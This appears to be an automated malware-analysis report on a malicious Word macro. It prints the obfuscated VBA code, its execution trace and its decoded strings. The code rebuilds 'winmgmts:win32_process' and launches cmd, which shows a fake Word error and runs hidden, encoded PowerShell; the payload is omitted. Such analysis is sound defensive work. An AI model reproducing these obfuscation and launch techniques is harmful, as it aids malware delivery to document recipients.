                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      tFspDCJEJ

                                                                      CreateObject   CreateObject("winmgmts:win32_process")

                                                                      rknGHpIJ

                                                                      Paragraphs

                                                                      LGONCIz

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      chPFBOFy

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: nWADOALQ

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: EqstFcEf

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: CITOv

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: swJREBktH

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MllKTIJEc

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: fishDz

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: xvhwEkIi

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: vYqwDI

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MFcvbrIeP

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: HmUuEIbVG

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: gzBJqD

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: polxC

                                                                      Mid

                                                                      Len

                                                                      Len([obfuscated string omitted]) -> 21932

                                                                      Create

                                                                      SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded argument omitted],,) -> 0

                                                                      Twt08i5xpa9fd0

                                                                      L1e1dxo2wbinf3l6

                                                                      rlKgn

                                                                      Paragraphs

                                                                      igIuH

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      QgrUG

                                                                      Strings / Decrypted Strings
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ahpsg yw ah"
                                                                      "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ahsg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
Line | Instruction | Meta Information
2 | Function Xqcxarraokjbi() |
3 | On Error Resume Next | executed
4 | V1 = O9eax2mx6bn5xuv + Bcur5699z4d.Content + Bud375u79tqnjtr8hp | O9eax2mx6bn5xuv, Content, Bud375u79tqnjtr8hp
5 | Goto hnsxGG |
6 | Dim vpWmJA as Paragraph |
7 | Set HwQjGFBhp = bebkDqAH | bebkDqAH
8 | For Each vpWmJA in Bcur5699z4d.Paragraphs | Paragraphs
9 | Set yVvECoEYV = EWTFmUdCA | EWTFmUdCA
10 | If Left(vpWmJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then | Left, Range, Len
11 | hnsxGG = vpWmJA.Range.ListFormat.ListString | Range
12 | Elseif InStr(vpWmJA.Range.Text, "kkiew") > 1 Then | InStr, Range
13 | elbdiLVN = vpWmJA.Range.Text | Range
14 | elbdiLVN = Replace(saw, "sjgwb", "hqkwjbjdasd" & hnsxGG) | Replace, saw
15 | vpWmJA.Range.Text = elbdiLVN | Range
16 | Set vpWmJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal") | Range, Styles
17 | Endif |
18 | Set BdbvZ = ueWFHDCC | ueWFHDCC
19 | Next vpWmJA | Paragraphs
19 | hnsxGG: |
21 | U7 = "sg yw ahpsg yw ah" |
22 | Xa6pbm6di_vp9mwl = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah" |

                                                                      23

                                                                      Goto GHJmFFAIm

                                                                      24

                                                                      Dim ORjdHplF as Paragraph

                                                                      25

                                                                      Set twfalBEJ = yigPu

                                                                      yigPu

                                                                      26

                                                                      For Each ORjdHplF in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      27

                                                                      Set ATQXIsF = wTLHBUFzI

                                                                      wTLHBUFzI

                                                                      28

                                                                      If Left(ORjdHplF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      29

                                                                      GHJmFFAIm = ORjdHplF.Range.ListFormat.ListString

                                                                      Range

                                                                      30

                                                                      Elseif InStr(ORjdHplF.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      31

                                                                      JozvGJc = ORjdHplF.Range.Text

                                                                      Range

                                                                      32

                                                                      JozvGJc = Replace(saw, "sjgwb", "hqkwjbjdasd" & GHJmFFAIm)

                                                                      Replace

                                                                      saw

                                                                      33

                                                                      ORjdHplF.Range.Text = JozvGJc

                                                                      Range

                                                                      34

                                                                      Set ORjdHplF.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      35

                                                                      Endif

                                                                      36

                                                                      Set QxPrAc = oSnKJGCv

                                                                      oSnKJGCv

                                                                      37

                                                                      Next ORjdHplF

                                                                      Paragraphs

                                                                      37

                                                                      GHJmFFAIm:

                                                                      39

                                                                      Jziyk2numi4eksqusj = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"

                                                                      40

                                                                      Goto GLKaFEDcX

                                                                      41

                                                                      Dim kYUGGMJ as Paragraph

                                                                      42

                                                                      Set RpARJ = NVFQOFAXs

                                                                      NVFQOFAXs

                                                                      43

                                                                      For Each kYUGGMJ in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      44

                                                                      Set hHdBIMIgE = KoPDIC

                                                                      KoPDIC

                                                                      45

                                                                      If Left(kYUGGMJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      46

                                                                      GLKaFEDcX = kYUGGMJ.Range.ListFormat.ListString

                                                                      Range

                                                                      47

                                                                      Elseif InStr(kYUGGMJ.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      48

                                                                      TpXhGgIp = kYUGGMJ.Range.Text

                                                                      Range

                                                                      49

                                                                      TpXhGgIp = Replace(saw, "sjgwb", "hqkwjbjdasd" & GLKaFEDcX)

                                                                      Replace

                                                                      saw

                                                                      50

                                                                      kYUGGMJ.Range.Text = TpXhGgIp

                                                                      Range

                                                                      51

                                                                      Set kYUGGMJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      52

                                                                      Endif

                                                                      53

                                                                      Set iGMIJABIz = vlZuYFCC

                                                                      vlZuYFCC

                                                                      54

                                                                      Next kYUGGMJ

                                                                      Paragraphs

                                                                      54

                                                                      GLKaFEDcX:

                                                                      56

                                                                      Kdpt7ybnm0buk = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"

                                                                      57

                                                                      Goto QyjOFbQGB

                                                                      58

                                                                      Dim wNsHseJob as Paragraph

                                                                      59

                                                                      Set crnYCaC = mJzxEXG

                                                                      mJzxEXG

                                                                      60

                                                                      For Each wNsHseJob in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      61

                                                                      Set FdSuG = bssipAJC

                                                                      bssipAJC

                                                                      62

                                                                      If Left(wNsHseJob.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      63

                                                                      QyjOFbQGB = wNsHseJob.Range.ListFormat.ListString

                                                                      Range

                                                                      64

                                                                      Elseif InStr(wNsHseJob.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      65

                                                                      DrqvEr = wNsHseJob.Range.Text

                                                                      Range

                                                                      66

                                                                      DrqvEr = Replace(saw, "sjgwb", "hqkwjbjdasd" & QyjOFbQGB)

                                                                      Replace

                                                                      saw

                                                                      67

                                                                      wNsHseJob.Range.Text = DrqvEr

                                                                      Range

                                                                      68

                                                                      Set wNsHseJob.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      69

                                                                      Endif

                                                                      70

                                                                      Set HgufGDBpC = IpndaHM

                                                                      IpndaHM

                                                                      71

                                                                      Next wNsHseJob

                                                                      Paragraphs

                                                                      71

                                                                      QyjOFbQGB:

                                                                      73

                                                                      T_b71hsugbvq289o = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"

                                                                      Mid

                                                                      Name

                                                                      Application

                                                                      74

                                                                      Goto DMzpFn

                                                                      75

                                                                      Dim MscjBIE as Paragraph

                                                                      76

                                                                      Set AZyYMo = lscaG

                                                                      lscaG

                                                                      77

                                                                      For Each MscjBIE in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      78

                                                                      Set cLxQFB = wgusFA

                                                                      wgusFA

                                                                      79

                                                                      If Left(MscjBIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      80

                                                                      DMzpFn = MscjBIE.Range.ListFormat.ListString

                                                                      Range

                                                                      81

                                                                      Elseif InStr(MscjBIE.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      82

                                                                      RxTZR = MscjBIE.Range.Text

                                                                      Range

                                                                      83

                                                                      RxTZR = Replace(saw, "sjgwb", "hqkwjbjdasd" & DMzpFn)

                                                                      Replace

                                                                      saw

                                                                      84

                                                                      MscjBIE.Range.Text = RxTZR

                                                                      Range

                                                                      85

                                                                      Set MscjBIE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      86

                                                                      Endif

                                                                      87

                                                                      Set jdDhS = HpOdl

                                                                      HpOdl

                                                                      88

                                                                      Next MscjBIE

                                                                      Paragraphs

                                                                      88

                                                                      DMzpFn:

                                                                      90

                                                                      Iybdpqjdde6_svpju7 = Kdpt7ybnm0buk + T_b71hsugbvq289o + Jziyk2numi4eksqusj + U7 + Xa6pbm6di_vp9mwl

                                                                      91

                                                                      Goto uRNYED

                                                                      92

                                                                      Dim GvZhcxcBE as Paragraph

                                                                      93

                                                                      Set WLdYLJOB = PAyxzTsC

                                                                      PAyxzTsC

                                                                      94

                                                                      For Each GvZhcxcBE in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      95

                                                                      Set RYtzeF = sVBjGLE

                                                                      sVBjGLE

                                                                      96

                                                                      If Left(GvZhcxcBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      97

                                                                      uRNYED = GvZhcxcBE.Range.ListFormat.ListString

                                                                      Range

                                                                      98

                                                                      Elseif InStr(GvZhcxcBE.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      99

                                                                      mNAmBCKAC = GvZhcxcBE.Range.Text

                                                                      Range

                                                                      100

                                                                      mNAmBCKAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & uRNYED)

                                                                      Replace

                                                                      saw

                                                                      101

                                                                      GvZhcxcBE.Range.Text = mNAmBCKAC

                                                                      Range

                                                                      102

                                                                      Set GvZhcxcBE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      103

                                                                      Endif

                                                                      104

                                                                      Set kFOCACABC = RmTjACo

                                                                      RmTjACo

                                                                      105

                                                                      Next GvZhcxcBE

                                                                      Paragraphs

                                                                      105

                                                                      uRNYED:

                                                                      107

                                                                      H7kfpfj7v13k0 = Yvxv3g2kutodnaylkq(Iybdpqjdde6_svpju7)

                                                                      108

                                                                      Goto clyLjDhC

                                                                      109

                                                                      Dim VrghdcJA as Paragraph

                                                                      110

                                                                      Set kyTwIN = zjQpkF

                                                                      zjQpkF

                                                                      111

                                                                      For Each VrghdcJA in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      112

                                                                      Set xmKhhI = ClofCvn

                                                                      ClofCvn

                                                                      113

                                                                      If Left(VrghdcJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      114

                                                                      clyLjDhC = VrghdcJA.Range.ListFormat.ListString

                                                                      Range

                                                                      115

                                                                      Elseif InStr(VrghdcJA.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      116

                                                                      LATJAGVFG = VrghdcJA.Range.Text

                                                                      Range

                                                                      117

                                                                      LATJAGVFG = Replace(saw, "sjgwb", "hqkwjbjdasd" & clyLjDhC)

                                                                      Replace

                                                                      saw

                                                                      118

                                                                      VrghdcJA.Range.Text = LATJAGVFG

                                                                      Range

                                                                      119

                                                                      Set VrghdcJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      120

                                                                      Endif

                                                                      121

                                                                      Set IyCjJCAKS = tFspDCJEJ

                                                                      tFspDCJEJ

                                                                      122

                                                                      Next VrghdcJA

                                                                      Paragraphs

                                                                      122

                                                                      clyLjDhC:

                                                                      124

                                                                      Set W71k24g1fo31hq05ui = CreateObject(H7kfpfj7v13k0)

                                                                      CreateObject("winmgmts:win32_process")

                                                                      executed
                                                                      125

                                                                      Goto CJIuIYEKI

                                                                      126

                                                                      Dim djUnAEBd as Paragraph

                                                                      127

                                                                      Set nATRHnACI = rknGHpIJ

                                                                      rknGHpIJ

                                                                      128

                                                                      For Each djUnAEBd in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      129

                                                                      Set PyQuEPBH = LGONCIz

                                                                      LGONCIz

                                                                      130

                                                                      If Left(djUnAEBd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      131

                                                                      CJIuIYEKI = djUnAEBd.Range.ListFormat.ListString

                                                                      Range

                                                                      132

                                                                      Elseif InStr(djUnAEBd.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      133

                                                                      gnnIFFf = djUnAEBd.Range.Text

                                                                      Range

                                                                      134

                                                                      gnnIFFf = Replace(saw, "sjgwb", "hqkwjbjdasd" & CJIuIYEKI)

                                                                      Replace

                                                                      saw

                                                                      135

                                                                      djUnAEBd.Range.Text = gnnIFFf

                                                                      Range

                                                                      136

                                                                      Set djUnAEBd.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      137

                                                                      Endif

                                                                      138

                                                                      Set AYQZHEBI = chPFBOFy

                                                                      chPFBOFy

                                                                      139

                                                                      Next djUnAEBd

                                                                      Paragraphs

                                                                      139

                                                                      CJIuIYEKI:

                                                                      141

                                                                      KK = Yvxv3g2kutodnaylkq(Mid(V1, (4), Len(V1)))

                                                                      Mid

                                                                      Len(...) -> 21932

                                                                      executed
                                                                      142

                                                                      W71k24g1fo31hq05ui.Create KK, Twt08i5xpa9fd0, L1e1dxo2wbinf3l6

                                                                      SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc ...,,) -> 0

                                                                      Twt08i5xpa9fd0

                                                                      L1e1dxo2wbinf3l6

                                                                      executed
                                                                      143

                                                                      Goto wZFCUdE

                                                                      144

                                                                      Dim clyZlt as Paragraph

                                                                      145

                                                                      Set JJqbCtEH = rlKgn

                                                                      rlKgn

                                                                      146

                                                                      For Each clyZlt in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      147

                                                                      Set DdtFCGIA = igIuH

                                                                      igIuH

                                                                      148

                                                                      If Left(clyZlt.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      149

                                                                      wZFCUdE = clyZlt.Range.ListFormat.ListString

                                                                      Range

                                                                      150

                                                                      Elseif InStr(clyZlt.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      151

                                                                      dPYykYG = clyZlt.Range.Text

                                                                      Range

                                                                      152

                                                                      dPYykYG = Replace(saw, "sjgwb", "hqkwjbjdasd" & wZFCUdE)

                                                                      Replace

                                                                      saw

                                                                      153

                                                                      clyZlt.Range.Text = dPYykYG

                                                                      Range

                                                                      154

                                                                      Set clyZlt.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      155

                                                                      Endif

                                                                      156

                                                                      Set OnCoGHI = QgrUG

                                                                      QgrUG

                                                                      157

                                                                      Next clyZlt

                                                                      Paragraphs

                                                                      157

                                                                      wZFCUdE:

                                                                      159

                                                                      End Function

                                                                      APIs | Meta Information

                                                                      ZBXzADzi

                                                                      Paragraphs

                                                                      ZAXDGY

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      EBTVGH

                                                                      ilrmFI

                                                                      Paragraphs

                                                                      zhliJ

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      DvhBN

                                                                      wHzvQRHCw

                                                                      Paragraphs

                                                                      OtoVEFFI

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      tfnHGB

                                                                      Replace

                                                                      Replace("wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ahssg yw ahsg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah","sg yw ah",) -> winmgmts:win32_process

                                                                      Replace(...,"sg yw ah",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc ...

                                                                      Zn5_1mdwh2kp2

                                                                      aNLHyKGxD

                                                                      Paragraphs

                                                                      VrzOGkkDJ

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      ykoqBxAG

                                                                      BjqtUGzGV

                                                                      Paragraphs

                                                                      LEeUqk

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      wuVfVIU

                                                                      ifZhJxP

                                                                      Paragraphs

                                                                      rQGxCbRtR

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      NirTjIE

                                                                      Strings | Decrypted Strings
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "sg yw ah"
                                                                      Line | Instruction | Meta Information
                                                                      230

                                                                      Function Hbs0geilvqul(Cxe014lg73v5)

                                                                      231

                                                                      Goto dUBsAD

                                                                      executed
                                                                      232

                                                                      Dim TpAnAB as Paragraph

                                                                      233

                                                                      Set IEHycIT = ZBXzADzi

                                                                      ZBXzADzi

                                                                      234

                                                                      For Each TpAnAB in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      235

                                                                      Set BRoZbEF = ZAXDGY

                                                                      ZAXDGY

                                                                      236

                                                                      If Left(TpAnAB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      237

                                                                      dUBsAD = TpAnAB.Range.ListFormat.ListString

                                                                      Range

                                                                      238

                                                                      Elseif InStr(TpAnAB.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      239

                                                                      FTbqcNF = TpAnAB.Range.Text

                                                                      Range

                                                                      240

                                                                      FTbqcNF = Replace(saw, "sjgwb", "hqkwjbjdasd" & dUBsAD)

                                                                      Replace

                                                                      saw

                                                                      241

                                                                      TpAnAB.Range.Text = FTbqcNF

                                                                      Range

                                                                      242

                                                                      Set TpAnAB.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      243

                                                                      Endif

                                                                      244

                                                                      Set bEIjwUFFB = EBTVGH

                                                                      EBTVGH

                                                                      245

                                                                      Next TpAnAB

                                                                      Paragraphs

                                                                      245

                                                                      dUBsAD:

                                                                      247

                                                                      Goto ruwfBB

                                                                      248

